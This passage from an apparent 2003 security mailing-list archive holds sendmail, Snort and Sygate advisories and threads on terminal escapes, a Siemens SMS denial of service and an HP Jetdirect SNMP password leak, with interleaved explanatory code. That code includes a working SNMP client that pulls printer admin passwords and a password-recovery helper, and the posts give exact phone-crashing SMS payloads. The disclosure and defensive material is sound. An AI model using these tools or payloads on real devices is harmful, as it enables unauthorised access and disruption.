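    """Undo a constant byte shift over the whole buffer."""
    return bytes((b - shift) % 256 for b in data)


def printable_runs(data, min_len=4):
    """Runs of printable ASCII (0x20..0x7E) at least min_len long."""
    runs, cur = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(bytes(cur))
            cur = bytearray()
    if len(cur) >= min_len:
        runs.append(bytes(cur))
    return runs


def recover_candidates(blob, shift, min_len=4):
    """Apply a shift learned from an account you control to the whole file
    and return the printable strings that fall out (candidate passwords)."""
    return printable_runs(unshift(blob, shift), min_len)


if __name__ == "__main__":
    hits = constant_shift_hits(b"ABCDEFGH", SAMPLE_BLOB)
    print("hits:", hits)
    for _pos, shift in hits:
        print("shift %d ->" % shift, recover_candidates(SAMPLE_BLOB, shift))
```

If the function returns no hit for a password you set yourself, the transform is not a constant shift and this check tells you nothing further; it confirms or rejects the one hypothesis the published sample suggests.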

Sygate Security Bulletin SS20030221-0001

2003-03-03 Thread Elisha Riedlinger


On 2/21/2003 Sygate posted a Security Response to vuln-dev in response to an
advisory posted by Oliver Lavery (xenophi1e) oliver.lavery at sympatico dot
com.

When first responding to the advisory, it was believed that the
vulnerability was reporting that the Sygate Personal Firewall process itself
was vulnerable to evasion through the use of CreateRemoteThread(). Sygate
Security Bulletin SS20030221-0001 described protections that are in place to
prevent this type of evasion in the Sygate Personal Firewall Process itself.
After re-examining the vulnerability report and working with the reporter of
this vulnerability, Oliver Lavery, it was determined that the report
discussed the insertion of code into the address space of other
applications. 

The vulnerability advisory highlights the issue that a firewall restricting
network access on a per-application basis does not protect against many
types of application behavior, particularly those relating to how the
application interacts with the operating system.  Sygate Personal Firewall
determines which applications are authorized to send and receive traffic
based on MD5 hashes (also called fingerprints) of the executables, the .DLLs
used by the application and the associated firewall rules. If a malicious
program executes code within the address space of an authorized application,
that traffic will be allowed by the personal firewall.

The scope of the filtering technology within Sygate Personal Firewall does
not include monitoring the address space of a given process.  The
restriction of system and API calls in third-party applications is currently
outside of the scope of the network-based functionality of Sygate Personal
Firewall.

Sygate Personal Firewall employs a variety of technologies to protect a
computer, including trojan and network intrusion prevention to provide
several layers of network-based protection.  Sygate is developing new
technologies and will continue to work towards providing the most
comprehensive security solutions for our customers.

Elisha Riedlinger
Product Manager
Sygate Technologies, Inc.



SuSE Security Announcement: sendmail (SuSE-SA:2003:013)

2003-03-03 Thread Roman Drahtmueller
-BEGIN PGP SIGNED MESSAGE-

__

SuSE Security Announcement

Package:sendmail, sendmail-tls
Announcement-ID:SuSE-SA:2003:013
Date:   Monday, March 3rd 2003, 18:10 MET
Affected products:  7.1, 7.2, 7.3, 8.0, 8.1
SuSE Linux Database Server,
SuSE Linux Enterprise Server 7, 8
SuSE Linux Firewall on CD/Admin host
SuSE Linux Connectivity Server
SuSE Linux Office Server
Vulnerability Type: local privilege escalation
Severity (1-10):7
SuSE default package:   yes (until SuSE Linux 8.0 and SLES7)
Cross References:   http://www.cert.org/advisories/CA-2003-07.html

Content of this advisory:
1) security vulnerability resolved: sendmail
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
- vnc
- w3m
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

sendmail is the most widely used mail transport agent (MTA) in the
internet. A remotely exploitable buffer overflow has been found in all
versions of sendmail that come with SuSE products. These versions include
sendmail-8.11 and sendmail-8.12 releases. sendmail is the MTA subsystem
that is installed by default on all SuSE products up to and including
SuSE Linux 8.0 and the SuSE Linux Enterprise Server 7.

The vulnerability is triggered by an email message sent through the
sendmail MTA subsystem. In that respect, it is different from commonly
known bugs that occur in the context of an open TCP connection. By
consequence, the vulnerability also exists if email messages get forwarded
over a relay that itself does not run a vulnerable MTA. This specific
detail and the wide distribution of sendmail in the internet causes this
vulnerability to be considered an error of major severity.

The buffer overflow happens on the heap and is known to be exploitable.
As of the writing of this announcement, there is no exploit known to exist
in the public. Since there is no known workaround for this vulnerability
other than using a different MTA, it is strongly recommended to install
the update packages as offered at the locations as listed below.

We would like to express our gratitude to Eric Allman for notifying
SuSE Security of the problem. The vulnerability was discovered by
ISS Internet Security Systems, inc.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.

SPECIAL INSTALL INSTRUCTIONS:
==
After performing the update, it is necessary to restart all running
instances of sendmail using the command rcsendmail restart as root.



Intel i386 Platform:

SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-91.i586.rpm
  0f3d981ad8e9be64bc70aff474ce303c

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-devel-8.12.6-91.i586.rpm
  afe98a29de75ecd362fad5b02a922856
patch rpm(s):

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-91.i586.patch.rpm
  ebd8f188748812aff2830b23de6f34b3

ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-devel-8.12.6-91.i586.patch.rpm
  09ff6834c369051d165d78f01a44d684
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/sendmail-8.12.6-91.src.rpm
  50e471df3a90ce4b54b2c5ca3fbc081e

SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-72.i386.rpm
  09e0a8ed5b189c7c819d3d38f74a07e1
ftp://ftp.suse.com/pub/suse/i386/update/8.0/d4/sendmail-devel-8.12.3-72.i386.rpm
  72a8c31090299df6b7bd52ea38c31c2b
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-72.i386.patch.rpm
  905b39525ecd0506892b442a204b7aa3

ftp://ftp.suse.com/pub/suse/i386/update/8.0/d4/sendmail-devel-8.12.3-72.i386.patch.rpm
  a03e4a221c1fb8f2387dc133ada9e604
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sendmail-8.12.3-72.src.rpm
  6e3106de72c4605d379dc2133adba97b

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/sendmail-8.11.6-162.i386.rpm

Re: Terminal Emulator Security Issues

2003-03-03 Thread Michael Jennings
On Monday, 03 March 2003, at 17:43:28 (-),
Kenn Humborg wrote:

 What about the CSI character, code 155 (128+27), which DEC terminals
 (from at least vt220) interpret as a shorthand for ESC [?

Eterm is a vt102 emulator, not a vt220 emulator.  It does not support
the 8-bit version of the CSI.  You can test this using:

  echo -e "\23321t"

You'll get that exact same string in response.

It may be supported at some point in the future, however, in which
case it would be considered a control character just like any other.

Michael

-- 
Michael Jennings (a.k.a. KainX)  http://www.kainx.org/  [EMAIL PROTECTED]
n + 1, Inc., http://www.nplus1.net/   Author, Eterm (www.eterm.org)
---
 Three six nine, the goose drank wine; the monkey chewed tobacco on
  the street car line.  The line broke, the monkey got choked, and
  they all went to heaven in a little row boat.  -- Nursery Rhyme
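
The exchange turns on two spellings of the same control: the 7-bit `ESC [` and the 8-bit CSI byte 0x9B (155). A filter that only looks for ESC misses the second form on any emulator that honours it. The Python below is an added example, not Eterm code: it strips both forms of CSI, the string-type controls (OSC, DCS, SOS, PM, APC) in both forms up to their terminator, plain two-character escapes, and the remaining C0/C1 control characters, before untrusted data is written to a terminal. The window-title report `CSI 21 t` used in the test above is among the sequences removed. It assumes the input has been decoded to `str` such that U+0080..U+009F are the C1 controls (true of Latin-1; for UTF-8 data decode first).

```python
# 7-bit introducers (after ESC) of control strings and their 8-bit C1 forms:
# ESC ] = 0x9D (OSC), ESC P = 0x90 (DCS), ESC X = 0x98 (SOS),
# ESC ^ = 0x9E (PM),  ESC _ = 0x9F (APC). CSI: ESC [ = 0x9B. ST: ESC \ = 0x9C.
_STRING_INTRO_7BIT = "]PX^_"
_STRING_INTRO_8BIT = "\x9d\x90\x98\x9e\x9f"


def _skip_csi(text, i):
    """i is just past the CSI introducer: consume parameter (0x30-0x3F) and
    intermediate (0x20-0x2F) bytes, then one final byte (0x40-0x7E)."""
    n = len(text)
    while i < n and "\x20" <= text[i] <= "\x3f":
        i += 1
    return i + 1 if i < n else i


def _skip_string(text, i):
    """Consume a control string up to ST (ESC \\ or 0x9C) or BEL (xterm OSC)."""
    n = len(text)
    while i < n:
        if text[i] in "\x07\x9c":
            return i + 1
        if text[i] == "\x1b" and i + 1 < n and text[i + 1] == "\\":
            return i + 2
        i += 1
    return i


def sanitize_terminal(text):
    """Return text with every escape/control sequence removed; keeps
    printable characters, newline and tab only."""
    out = []
    i, n = 0, len(text)
    while i < n:
        c = text[i]
        if c == "\x1b":
            i += 1
            if i >= n:
                break                          # stray ESC at end of input
            intro = text[i]
            i += 1
            if intro == "[":
                i = _skip_csi(text, i)
            elif intro in _STRING_INTRO_7BIT:
                i = _skip_string(text, i)
            else:
                # ESC <intermediates>* <final>, e.g. ESC ( B; `intro` may
                # already be the final byte (ESC 7, ESC c).
                while "\x20" <= intro <= "\x2f" and i < n:
                    intro = text[i]
                    i += 1
        elif c == "\x9b":
            i = _skip_csi(text, i + 1)
        elif c in _STRING_INTRO_8BIT:
            i = _skip_string(text, i + 1)
        elif c in "\n\t" or "\x20" <= c <= "\x7e" or c >= "\xa0":
            out.append(c)
            i += 1
        else:                                  # other C0, DEL, other C1
            i += 1
    return "".join(out)


if __name__ == "__main__":
    import sys
    sys.stdout.write(sanitize_terminal(sys.stdin.read()))
```

Dropping 0x9B is deliberate even for an emulator that does not currently honour it: the reply above says it may be treated as a control character later, and the filter costs nothing on emulators that already ignore it.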


Siemens *35 and 45 series phones SMS Denial of Service

2003-03-03 Thread subj subj


Information:

Name of vulnerability: Siemens *35-45 DoS SMS Lag
Affected: all versions of Siemens *35 and *45.
Official site: www.siemens-mobile.com
Kind of vulnerability: Denial of Service.
Type of vulnerability: Remote / local.
Author: subj ([EMAIL PROTECTED])
Date: 02.03.2003
Site: www.dwcgr0up.com

Description of vulnerability:

 There is a local and a remote vulnerability in
 Siemens *35 and *45 series phones.

 A message of the form %"String", where String is one of the
 languages from the phone's language selection menu, will
 completely disable *35 series phones and cause
 a 2-minute read delay on *45 series phones. Note that
 the first letter of the language must be capitalized and
 the quotation marks must be present in the message.

 The phone will try to read the message and then, after 2 minutes,
 return to the main menu. This happens every time the message is sent.
 After 10-15 messages the (NiMH) battery is empty.

 There is a local vulnerability of the same kind. A message of the
 form %some_word, where some_word is any lower-case letter
 sequence, will have the same effects described above.

Vulnerability exploiting:

 (for remote):
 We send the victim phone the message:
   %"Deutsch"
 or
   %"Polski" %"Magyar" %"English" %"Deutsch"
 (for local):
   testedersecurity

Thanks:
 DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp
 l0bster, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, dron 
(Ivanov Andrey)


RE: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin

2003-03-03 Thread [EMAIL PROTECTED]
Sven,

I have been doing some research on the same issue, and it appears that 
some of the new firmware versions from HP actually fix this 
vulnerability by replacing the web server with a newer version that 
doesn't rely on client-side java to verify the password.

The issue at hand stems from the fact that the web server in older 
firmware versions (and some of the newer firmware versions) relied on 
client-side java to validate the administrator login.  This 
implementation did not encrypt and send the password to the web server 
to validate, but retrieved the password through snmp (read: plaintext) 
from the printer and validated the login on the client side.

As far as the fixes go, neither of the fixes that you outlined will 
remedy the situation:
1.  If you set the snmp community string to anything other than the 
default, 'internal' (the default for the JetAdmin Web Server) will still 
work.  The snmp community string of 'internal' is, as far as I have been 
able to tell, unremovable.  Once the snmp community strings have been 
set to whatever non-default string you want, 'internal' still seems to 
work.
2.  If you do not set a password on the JetAdmin Web Server, anyone can 
change the settings without authentication.

The best solution in this case is to disable the JetAdmin Web Server (if 
you cannot upgrade the firmware to include the Web Server that isn't 
written with client-side java) by typing 'ews-config: 0' at the telnet 
prompt.  Once this is done, the password can still be retrieved through 
the snmp object you mentioned, however no access will be granted (make 
sure your telnet password is different).  If you upgrade the printer 
firmware, an easy check to see if the new version is vulnerable is to 
access the web server: if you see the old, mostly-blue colored page, 
you're still vulnerable.  The new web server will still reply to the 
snmp request, but from what I've seen, it's always null (all 0x00, 0x00,...)

One more side note:  in your example, the raw ascii string is actually 
'ABCDUV'  :)

Have you talked to HP about this?

Geoff

-Original Message-
From: Sven Pechler [mailto:[EMAIL PROTECTED]
Sent: Monday, March 03, 2003 9:26 AM
To: [EMAIL PROTECTED]
Subject: New HP Jetdirect SNMP password vulnerability when using Web
JetAdmin


Hello,

During an analysis of some HP Jetdirect cards I discovered a security
issue that could lead to full access to a networked printer.
It looks like the vulnerability described in
http://www.securityfocus.com/bid/5331, but the OID is different and you
can only obtain one specific password.
It is also different from the password vulnerability described in
http://www.securityfocus.com/bid/3132
It applies to the following situation:

- Any operating system

-HP Jetdirect cards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A),
JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A)
and older.
-The Jetdirect card is being managed from HP Web Jetadmin.

-A Web Jetadmin device password had been set on the JetDirect card.
(This password must be set from Web Jetadmin and has nothing to do with
the Telnet password or the SNMP Set community name)
In the above situation the Web Jetadmin device password is readable as
plain ASCII text from the JetDirect card using SNMP.
How to check your printers for this vulnerability:

Use an SNMP toolkit to read the following OID from your printer:
.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-
printer.generalDeviceStatus.gdPasswords
(In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)
An example on a Windows machine, using SNMPUTIL from the Windows Resource
kit:
C:\>snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
Value    = String
0x41 0x42 0x43 0x44 0x55 0x56 0x3d 0x31 0x30 0x38 0x3b 0x00 0x00 0x00 0x00 ..etc...
The resulting string reads in ASCII: ABCDEF=108;
The Web Jetadmin device password is the word before the '=' sign, in this
case: ABCDEF
How to protect your printer:

1.  Keep the Web Jetadmin device password EMPTY (don't do this on
newer cards than the ones mentioned above)
2.  Define a 'Set community name'  instead
Additional means of protection (does not address the SNMP vulnerability):
3.  Define a telnet password (do not keep it empty)
4.  Create an 'allow list' from the Telnet console to restrict access
from defined IP-addresses
Sven Pechler
University of Technology Eindhoven
Faculty of Technology Management
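
The check above needs only a single SNMPv1 GET of the gdPasswords object, and the interesting part of the reply is the ASCII before the '=' (which, as Geoff notes, reads ABCDUV in the quoted dump: 0x55 0x56 are 'U' 'V'). The Python below is an added example, not HP or SNMPUTIL code: it hand-encodes the SNMPv1 GetRequest for that OID in BER (RFC 1157 message, RFC 1155/ASN.1 encoding), pulls the OCTET STRING values out of a reply, and also turns a pasted snmputil hex dump back into bytes so the password can be read without touching the printer. The network call at the end is the only part that needs a live device; the host address, community string and the assumption that the value is NUL-padded after ';' are this example's own.

```python
import re
import socket

# hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords
GD_PASSWORDS_OID = "1.3.6.1.4.1.11.2.3.9.1.1.13.0"

# Value column as snmputil printed it in the post (constructed copy).
SNMPUTIL_OUTPUT = ("0x41 0x42 0x43 0x44 0x55 0x56 0x3d 0x31 0x30 0x38 "
                   "0x3b 0x00 0x00 0x00 0x00")


def ber_len(n):
    """BER length: short form below 128, else 0x80|k followed by k bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber_int(value):
    """INTEGER (tag 0x02), minimal two's complement with room for the sign bit."""
    size = max(1, (value.bit_length() + 8) // 8)
    return b"\x02" + ber_len(size) + value.to_bytes(size, "big", signed=True)


def ber_oid(dotted):
    """OBJECT IDENTIFIER (tag 0x06): first two arcs packed as 40*a+b, the
    rest in base-128 with the high bit set on all but the last byte."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    body = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body.extend(reversed(chunk))
    return b"\x06" + ber_len(len(body)) + bytes(body)


def build_snmp_get(community, oid, request_id=1):
    """SNMPv1 GetRequest (RFC 1157) for one OID, as raw bytes."""
    varbind = b"\x30" + ber_len(len(ber_oid(oid)) + 2) + ber_oid(oid) + b"\x05\x00"
    varbinds = b"\x30" + ber_len(len(varbind)) + varbind
    pdu_body = ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds
    pdu = b"\xa0" + ber_len(len(pdu_body)) + pdu_body      # [0] GetRequest-PDU
    msg_body = ber_int(0) + b"\x04" + ber_len(len(community)) + community + pdu
    return b"\x30" + ber_len(len(msg_body)) + msg_body


def ber_walk(buf):
    """Yield (tag, contents) for each TLV in buf (definite lengths only)."""
    i = 0
    while i < len(buf):
        tag, ln = buf[i], buf[i + 1]
        i += 2
        if ln & 0x80:
            k = ln & 0x7F
            ln = int.from_bytes(buf[i:i + k], "big")
            i += k
        yield tag, buf[i:i + ln]
        i += ln


def octet_strings(buf):
    """All OCTET STRING values in a message, in order: in a GetResponse the
    community string comes first and the varbind value last."""
    out = []
    for tag, val in ber_walk(buf):
        if tag == 0x04:
            out.append(val)
        elif tag in (0x30, 0xA0, 0xA2):        # SEQUENCE, GetRequest, GetResponse
            out.extend(octet_strings(val))
    return out


def parse_snmputil_hex(text):
    """snmputil's '0x41 0x42 ...' dump (also the run-together form) -> bytes."""
    return bytes(int(h, 16) for h in re.findall(r"0x([0-9a-fA-F]{2})", text))


def device_password(value):
    """gdPasswords holds '<password>=<rest>;' followed by NUL padding; the
    Web Jetadmin device password is the part before the '='."""
    text = value.split(b"\x00", 1)[0].decode("ascii", "replace")
    return text.split("=", 1)[0]


def fetch_device_password(host, community=b"public", timeout=3.0):
    """Live check (not exercised offline): send the GetRequest, decode the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_snmp_get(community, GD_PASSWORDS_OID), (host, 161))
        reply, _ = s.recvfrom(4096)
    values = octet_strings(reply)
    return device_password(values[-1]) if len(values) > 1 else None
```

On a card that has been patched in the way Geoff describes, `device_password` returns an empty string because the value is all NULs; an empty string from an unpatched card with a password set would instead mean the request never reached the gdPasswords object.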


Re: Siemens *35 and 45 series phones SMS Denial of Service

2003-03-03 Thread Jan Niehusmann
On Mon, Mar 03, 2003 at 01:06:43AM -, subj subj wrote:
  To vulnerability are subject: All versions siemens *35 and *45.
[...]
  languages from the phone language selection menu, will
  completely disable *35 series phones and result
  in a 2 minute read delay on *45 series phones. Note that

Please note that this vulnerability isn't as serious as you describe it.
At least on my S45, I am able to interrupt this 2 minute delay at any
time by pressing the 'hang up' key (but I have to press it for about half a
second instead of just hitting it), the message can be read by using
'edit message' instead of 'read message', and it can be deleted without
problems.

So while this obviously is a bug, it can hardly be called a DoS.

Jan



pgp0.pgp
Description: PGP signature


Re: Security responsible at AOL

2003-03-03 Thread Blud Clot
A few months ago I submitted a vulnerability about AIM through the appropriate form on 
their website and to this day I haven't received a response. My advice would be to not 
bother because they clearly don't care at all.

-BludClot

- Original Message -
From: Michael Schwartzkopff [EMAIL PROTECTED]
Date: Sun, 2 Mar 2003 11:58:31 +0100
To: [EMAIL PROTECTED]
Subject: Security responsible at AOL

 Hi,
 
 I tried for a long time to contact a security responsible at AOL. I had no 
 chance with the telephone or via web. Is here anybody to tell me whom to 
 contact at AOL. Thanks.
 
 -- 
 Dr. Michael Schwartzkopff
 MultiNET Services GmbH
 Bretonischer Ring 7
 85630 Grasbrunn
 
 Tel: (089) 456 911 50
 Fax: (089) 456 911 21
 mob: (0174) 343 28 75



[CLA-2003:571] Conectiva Linux Security Announcement - sendmail

2003-03-03 Thread secure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --

PACKAGE   : sendmail
SUMMARY   : Remote vulnerability
DATE  : 2003-03-03 19:30:00
ID: CLA-2003:571
RELEVANT
RELEASES  : 6.0, 7.0, 8

- -

DESCRIPTION
 Sendmail[1] is a widely used Mail Transfer Agent (MTA).
 
 Researchers at ISS[2] discovered and published[3] a remote
 vulnerability[4][5] in sendmail that could be used by an attacker to
 execute arbitrary code as root.
 
 This vulnerability can be exploited by creating and sending to a
 vulnerable sendmail server a carefully crafted email message. This
 message will trigger the vulnerability and arbitrary commands can be
 executed with administrative privileges.
 
 Please note that non-vulnerable mail servers can be used to pass such
 messages along so that, for example, even internal sendmail servers
 could be reached.
 
 Starting with Conectiva Linux 7.0, sendmail is no longer the default
 mail server and has been replaced with Postfix. But sendmail is still
 shipped in all Conectiva Linux versions.
 
 As with many other services, the email service, even if installed, is
 not started by default in Conectiva Linux.
 
 The Common Vulnerabilities and Exposures (CVE) project has assigned
 the name CAN-2002-1337[7] to this issue.


SOLUTION
 All sendmail users should upgrade their packages immediately. After
 the upgrade, the sendmail service will be automatically restarted if
 it was already running.
 
 
 REFERENCES
 1.http://www.sendmail.org/
 2.http://www.iss.net/
 3.http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
 4.http://www.cert.org/advisories/CA-2003-07.html
 5.http://www.kb.cert.org/vuls/id/398025
 6.http://www.sendmail.com/security/
 7.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1337


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_3cl.i386.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions regarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- -
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+Y+Nh42jd0JmAcZARAj6TAKDkgvTGscDsT95XBbE/yEO7jjOO9gCgrglI
s7NfdorrA+FnQm0Xy67kRSA=
=ZySZ
-END PGP SIGNATURE-



[Snort-2003-001] Buffer overflow in Snort RPC preprocessor (fwd)

2003-03-03 Thread Dave Ahmad


David Mirza Ahmad
Symantec

sabbe dhamma anatta

0x26005712
8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12

-- Forwarded message --


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Snort Vulnerability Advisory [SNORT-2003-001]

Date: 2003-03-03

Affected Snort Versions:

Any version from 1.8 up to those released before 2003-03-03 1PM
US/Eastern, including 1.9.0 and CVS HEAD (Snort 2.0beta)

Synopsis:

A buffer overflow has been found in the snort RPC normalization
routines by ISS X-Force.  This can cause snort to execute arbitrary
code embedded within sniffed network packets. This preprocessor is
enabled by default.

Snort 1.9.1 has been released to resolve this issue. For users using
CVS HEAD, a fix has been committed to the source tree.

Mitigation:

If you are in an environment that can not upgrade snort immediately,
comment out the line in your snort.conf that begins:

preprocessor rpc_decode

and replace it with

# preprocessor rpc_decode

Details:

When the rpc decoder normalizes fragmented RPC records, it incorrectly
checks the lengths of what is being normalized against the current
packet size.

The rpc decoder in Snort 1.9.1 and above contains new alert options
that can be used to help detect this attack.

Option                     Default State

alert_fragments            INACTIVE
alert_large_fragments      ACTIVE
alert_incomplete           ACTIVE
alert_multiple_requests    ACTIVE


The first option will alert on any fragmented RPC record it finds.
alert_large_fragments will alert when the reassembled fragment record
would exceed the current packet length. alert_incomplete will alert
when a partial record is found. alert_multiple_requests will alert
when more than one RPC request is found per packet (or reassembled
packet).
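To make the length check and the four alert conditions above concrete, here is an added example (not Snort's code) that walks Sun RPC record-marking fragments (RFC 5531: 4-byte header, high bit = last fragment, low 31 bits = fragment length) inside one TCP payload, validating every fragment length against the bytes actually left in the packet before trusting it. It assumes the payload is already isolated and in order; the enum names and the function name are this example's own.

```c
/* Added example, not Snort's code: bounds-checked walk over Sun RPC
 * record-marking fragments in one TCP payload. Flags mirror the
 * conditions the advisory's alert options describe. Assumes the
 * payload is already isolated and in order. */
#include <stdint.h>
#include <stddef.h>

enum {
    RPC_FRAGMENTED      = 1 << 0,  /* more than one fragment in a record   */
    RPC_LARGE_FRAGMENT  = 1 << 1,  /* fragment length exceeds packet data  */
    RPC_INCOMPLETE      = 1 << 2,  /* record not terminated in this packet */
    RPC_MULTIPLE_REQS   = 1 << 3,  /* more than one complete record        */
};

/* Walks the fragments in pkt[0..len). Returns a bitmask of the flags
 * above (0 = one complete, unfragmented record). Never reads past len:
 * each fragment length is checked against the remaining bytes first. */
int rpc_scan_fragments(const uint8_t *pkt, size_t len)
{
    int flags = 0;
    size_t off = 0, frags_in_record = 0, records = 0;

    while (off < len) {
        if (len - off < 4) {            /* truncated record-mark header */
            flags |= RPC_INCOMPLETE;
            break;
        }
        uint32_t hdr = ((uint32_t)pkt[off] << 24) | ((uint32_t)pkt[off+1] << 16)
                     | ((uint32_t)pkt[off+2] << 8) | pkt[off+3];
        int last = (hdr & 0x80000000u) != 0;
        uint32_t flen = hdr & 0x7fffffffu;
        off += 4;
        /* Compare the claimed fragment length against what is really
         * left in the packet; a claim larger than that is never trusted. */
        if (flen > len - off) {
            flags |= RPC_LARGE_FRAGMENT | RPC_INCOMPLETE;
            break;
        }
        off += flen;
        frags_in_record++;
        if (!last) continue;
        if (frags_in_record > 1) flags |= RPC_FRAGMENTED;
        frags_in_record = 0;
        records++;
    }
    if (frags_in_record > 0) flags |= RPC_INCOMPLETE;
    if (records > 1) flags |= RPC_MULTIPLE_REQS;
    return flags;
}
```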

Download Locations:

Sourcefire has acquired additional bandwidth and hosting to aid users
wishing to upgrade their Snort implementation.  Binaries are currently
not available, this is a source release only at this time.  As new
binaries become available they will be added to the site.

Source code: http://www.snort.org/dl/snort-1.9.1.tar.gz
GPG Signatures: http://www.snort.org/dl/snort-1.9.1.tar.gz.asc

CVS HEAD (Snort 2.0beta)  has been fixed as well.


- --
Martin Roesch - Founder/CTO, Sourcefire Inc. - (410)290-1616
Sourcefire: Snort-based Enterprise Intrusion Detection Infrastructure
[EMAIL PROTECTED] - http://www.sourcefire.com
Snort: Open Source Network IDS - http://www.snort.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (Darwin)

iD8DBQE+Y+Rtqj0FAQQ3KOARAurPAJ9qzBQCzOG2xxcn2IBfuOlDMjPhJwCfdgiX
M+f1Ccdy03evjCtBT1rq6YQ=
=RhwD
-END PGP SIGNATURE-